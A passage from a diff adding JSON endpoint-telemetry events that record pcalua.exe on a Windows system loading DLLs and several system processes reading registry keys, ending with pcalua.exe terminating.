"C:\\Windows\\System32\\msvcrt.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + 
"event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + 
"image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 
5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "pcaui.dll", + "image_path": "C:\\Windows\\System32\\pcaui.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "dui70.dll", + "image_path": "C:\\Windows\\System32\\dui70.dll", + "pid": 5020, 
+ "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "wer.dll", + "image_path": "C:\\Windows\\System32\\wer.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", + "registry_value": "W32:000000000008056A", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A\\VirtualDesktop", + "registry_value": 
"VirtualDesktop", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007980000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": 
"Input", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "image_load", + "image_name": "TextInputFramework.dll", + "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "CoreUIComponents.dll", + "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 
131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574008130000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008300000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreUAPCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008300000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883574008300000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883574008300000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", + "registry_value": "DelegateFolders", + "timestamp": 131883574008300000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ndfapi.dll", + "image_path": 
"C:\\Windows\\System32\\ndfapi.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "wdi.dll", + "image_path": "C:\\Windows\\System32\\wdi.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "duser.dll", + "image_path": "C:\\Windows\\System32\\duser.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008450000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": 
"HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "image_load", + "image_name": "atlthunk.dll", + "image_path": "C:\\Windows\\System32\\atlthunk.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008610000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": 
"AUDIODG.EXE", + "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", + "registry_value": "SequenceNumber", + "timestamp": 
131883574008920000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", + "registry_value": "W32:0000000000040570", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574008920000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574013520000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", + "registry_value": "W32:0000000000040570", + "timestamp": 131883574013640000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "terminate", + "timestamp": 131883574013690000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574013690000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574013690000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
